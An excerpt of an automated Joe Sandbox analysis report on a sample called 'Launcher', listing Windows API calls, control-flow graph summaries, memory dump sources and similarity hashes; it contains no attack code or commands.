                                                                        • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0024F641,0025F088,0000000C), ref: 0024F79E
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0024F641,0025F088,0000000C), ref: 0024F7B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID:
                                                                        • API String ID: 3000768030-0
                                                                        • Opcode ID: dc1caea5970b57136c7912860e9a4801d41738859f68c2c1262aec3220d26118
                                                                        • Instruction ID: f346596032d22cef11de1674dc4c91777c5c24006a0becefceae4280140bb7af
                                                                        • Opcode Fuzzy Hash: dc1caea5970b57136c7912860e9a4801d41738859f68c2c1262aec3220d26118
                                                                        • Instruction Fuzzy Hash: D211B4715247424ADB788E3E8EC8622FA94ABD6330F390729D4B7C65F1C278D866D251

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetLastError.KERNEL32(0025ED20,0000000C), ref: 0024BE33
                                                                        • ExitThread.KERNEL32 ref: 0024BE3A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorExitLastThread
                                                                        • String ID:
                                                                        • API String ID: 1611280651-0
                                                                        • Opcode ID: d53424f15efa870d5f06e6e827731689be1b2d0c4df3cd07b3684daee7c5498a
                                                                        • Instruction ID: 441b192195a8fbe9e10c418a179096c689acc6f3ec6dfb53b8cdee3adc903a50
                                                                        • Opcode Fuzzy Hash: d53424f15efa870d5f06e6e827731689be1b2d0c4df3cd07b3684daee7c5498a
                                                                        • Instruction Fuzzy Hash: C9F0AF70A60205AFEF09AFB0D84AA6E3B74FF40701F110489F40597252DB749A20CFA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 189 2500eb-2500f4 190 2500f6-250109 RtlFreeHeap 189->190 191 250123-250124 189->191 190->191 192 25010b-250122 GetLastError call 2507c0 call 250777 190->192 192->191
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00250C59,?,00000000,?,?,00250B75,?,00000007,?,?,0025118E,?,?), ref: 00250101
                                                                        • GetLastError.KERNEL32(?,?,00250C59,?,00000000,?,?,00250B75,?,00000007,?,?,0025118E,?,?), ref: 0025010C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 485612231-0
                                                                        • Opcode ID: 02903660c260871c12338c0cb87f1b061a0d3d6c041aeb907841db199350b57a
                                                                        • Instruction ID: 739c5ce358a607cada20de9cfde354ddc65d1973480f34ccd46cc6d41df78190
                                                                        • Opcode Fuzzy Hash: 02903660c260871c12338c0cb87f1b061a0d3d6c041aeb907841db199350b57a
                                                                        • Instruction Fuzzy Hash: 16E08C32200705ABDF212FA1FD4DB997B6CEB08793F054060FA0C86061DA34AA64CFCE

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 263 246e20-246ea5 call 242760 call 246f80 call 248130 call 24bd06 271 246eaa-246eb7 263->271 272 246ebe-246ecc 271->272 273 246f44-246f55 call 24943d 272->273 274 246ed2-246edf 272->274 277 246f5a-246f72 call 2481a0 call 249261 273->277 278 246f15-246f2b 274->278 279 246ee5-246ef2 274->279 280 246f75 278->280 284 246f30-246f3f call 248150 279->284 285 246ef8-246f05 279->285 280->272 284->280 285->277 289 246f0b-246f10 285->289 289->280
                                                                        APIs
                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00246F55
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Cpp_errorThrow_std::_
                                                                        • String ID:
                                                                        • API String ID: 2134207285-0
                                                                        • Opcode ID: 5614daa726a4d8e96dcd039800b523587bcece0296cb23eab9d223b798324b5d
                                                                        • Instruction ID: d7c2745baa3b7ba739cbb034470103a12153753fbbcc0d0d7ff895d3f5f9bb75
                                                                        • Opcode Fuzzy Hash: 5614daa726a4d8e96dcd039800b523587bcece0296cb23eab9d223b798324b5d
                                                                        • Instruction Fuzzy Hash: AA3119B4D24209DFCB08DFA8D554AAEBBF0BF49300F50846AE45AA7350DB749914CF56

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 293 24eebe-24eee8 294 24eeee-24eef0 293->294 295 24eeea-24eeec 293->295 297 24eef6-24eefd call 24edf3 294->297 298 24eef2-24eef4 294->298 296 24ef3f-24ef42 295->296 300 24ef02-24ef06 297->300 298->296 301 24ef25-24ef3c 300->301 302 24ef08-24ef16 GetProcAddress 300->302 304 24ef3e 301->304 302->301 303 24ef18-24ef23 call 24baf0 302->303 303->304 304->296
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9f12093ac135e8dd5080fdcd38afa29e17cb706755f9831aed41e8ebfd32c43
                                                                        • Instruction ID: 24dd36550dd084d0ca56f82d90a556f0896d4db268ee6ef0c261c52d8c83c626
                                                                        • Opcode Fuzzy Hash: d9f12093ac135e8dd5080fdcd38afa29e17cb706755f9831aed41e8ebfd32c43
                                                                        • Instruction Fuzzy Hash: 9901F5336302269BAF1A8F6CFC84A673365FB8432072B4025F902CB554EB71E8249BD1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CreateElliptic
                                                                        • String ID:
                                                                        • API String ID: 1611293138-0
                                                                        • Opcode ID: fc1de91835b998841e9aa5228cbda284086618238ac40b2d4127da2a7ca8fd36
                                                                        • Instruction ID: 8b636a372e52953e90899a0a5b857aedf304eb400f41f89ceb50e3be7cf35a0e
                                                                        • Opcode Fuzzy Hash: fc1de91835b998841e9aa5228cbda284086618238ac40b2d4127da2a7ca8fd36
                                                                        • Instruction Fuzzy Hash: E411E5B4D043089BDB04EFA8D5597AEBBF5FF48304F408819D855AB350EB78AA54CF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 316 250c65-250c71 317 250ca3-250cae call 250777 316->317 318 250c73-250c75 316->318 326 250cb0-250cb2 317->326 319 250c77-250c78 318->319 320 250c8e-250c9f RtlAllocateHeap 318->320 319->320 322 250ca1 320->322 323 250c7a-250c81 call 24d347 320->323 322->326 323->317 328 250c83-250c8c call 24c227 323->328 328->317 328->320
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,-A3400188,?,00249200,?,?,002467E7,?,00246199), ref: 00250C97
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: bcc64299bbf8bcdbf7ece032ec660b2abef134010c62be364ab5334134f45706
                                                                        • Instruction ID: fff4ebf78dbffa865f89e507d6fbdb21ff01e1e6240aecb970597b76b7424702
                                                                        • Opcode Fuzzy Hash: bcc64299bbf8bcdbf7ece032ec660b2abef134010c62be364ab5334134f45706
                                                                        • Instruction Fuzzy Hash: 22E0E5211316225AD6302F66EC95BAA76489F433B3F150312FC4096490CBB0EC248AEC
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00249CD6
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00249CE4
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00249CF5
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00249D06
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00249D17
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00249D28
                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00249D39
                                                                        • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00249D4A
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00249D5B
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00249D6C
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00249D7D
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00249D8E
                                                                        • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00249D9F
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00249DB0
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00249DC1
                                                                        • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00249DD2
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00249DE3
                                                                        • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00249DF4
                                                                        • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00249E05
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00249E16
                                                                        • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00249E27
                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00249E38
                                                                        • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00249E49
                                                                        • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00249E5A
                                                                        • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00249E6B
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00249E7C
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00249E8D
                                                                        • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00249E9E
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00249EAF
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00249EC0
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00249ED1
                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00249EE2
                                                                        • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00249EF3
                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00249F04
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00249F15
                                                                        • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00249F26
                                                                        • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00249F37
                                                                        • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00249F48
                                                                        • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00249F59
                                                                        • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00249F6A
                                                                        • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00249F7B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                        • API String ID: 667068680-295688737
                                                                        • Opcode ID: d973fabfa58ea5cdc358302dad741e648ba755af2095f2051f33ac414267a3d0
                                                                        • Instruction ID: 5b8257fa02331ddbd858a0cff9ca0d1b3e66d3bbc0981dfcb68a9008b7327884
                                                                        • Opcode Fuzzy Hash: d973fabfa58ea5cdc358302dad741e648ba755af2095f2051f33ac414267a3d0
                                                                        • Instruction Fuzzy Hash: 5C615871962350AFEB096FF5BC0D8963BE8AB0E7033054467F501D31A1DBF466648F68
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d27a9bd31eb650fadfe3ce0ced09a825c667e006028e4be528b6bf6a1b5d5e6c
                                                                        • Instruction ID: ef45b72c847d60bad9196ba328c2800dc530fc516b0185822409cbbb126e5e85
                                                                        • Opcode Fuzzy Hash: d27a9bd31eb650fadfe3ce0ced09a825c667e006028e4be528b6bf6a1b5d5e6c
                                                                        • Instruction Fuzzy Hash: 0CF25966A546D45FEF024AB8C4B53DB6FF24B6B730F2A279986F41F2D3C587010A9B10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !/>$EFde$EFde
                                                                        • API String ID: 0-183606976
                                                                        • Opcode ID: 1431763ed3323370d3c4fe490a9b58f574ce58210e0cc186cb9f9fe1466f9f62
                                                                        • Instruction ID: 0af55781a2301e9eea9c522abf948d2aa81ed50adcb0ce8478bd11ea1818c45e
                                                                        • Opcode Fuzzy Hash: 1431763ed3323370d3c4fe490a9b58f574ce58210e0cc186cb9f9fe1466f9f62
                                                                        • Instruction Fuzzy Hash: 5EA33572E219244BDB64CE79CC8179AB2F26F99330F5983E96639EB2D0D7705E418F40
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002518EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 4d9be1ba3694ea501d250572401857773382df60c63c6d355da35ff4f0b973d8
                                                                        • Instruction ID: c40b5f560212bb7bd7010885ca26cbfb4d214dfd9636da22f34b1dd16e6ed254
                                                                        • Opcode Fuzzy Hash: 4d9be1ba3694ea501d250572401857773382df60c63c6d355da35ff4f0b973d8
                                                                        • Instruction Fuzzy Hash: 62710671C251196FDF35EF289C9DBBEB7B9EB05301F1441D9E809A3251DA304EA98F18
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024A470
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0024A53C
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024A55C
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0024A566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 20e554be1242da84a61cd2f3d2ff7f650d8df348eccee455c87938cf683a868b
                                                                        • Instruction ID: f46bbd9d1c0f0a304e69c9574235cde4cbd619251a9ddaafb9efd45d3900f620
                                                                        • Opcode Fuzzy Hash: 20e554be1242da84a61cd2f3d2ff7f650d8df348eccee455c87938cf683a868b
                                                                        • Instruction Fuzzy Hash: 52310775D553189BDF21EFA4D9897CDBBB8AF08304F1040AAE40CAB250EB719B85CF45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: O^#
                                                                        • API String ID: 0-47714887
                                                                        • Opcode ID: 9dc9e04fb946f11d59382e4e4d75304a0206766023fcf2ac81766f33526c5a95
                                                                        • Instruction ID: 6d5251168fef841d825688fa2bc10e965f5f8bdb746d031f069f8b4c289ac5b0
                                                                        • Opcode Fuzzy Hash: 9dc9e04fb946f11d59382e4e4d75304a0206766023fcf2ac81766f33526c5a95
                                                                        • Instruction Fuzzy Hash: 03436A26A956D44FEF124A78C8753DB6FF24B27330F2A279686E41F2D3C54B054AAF10
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0024CEE2
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0024CEEC
                                                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0024CEF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: 09ae086a67c02cb642978d3b601628b29419bccc41fa4b248cee0ea593942d04
                                                                        • Instruction ID: 0dec6fc831ae5a740df382a6d274d523caefd4f5fa8b825026c3ad9eca2a4673
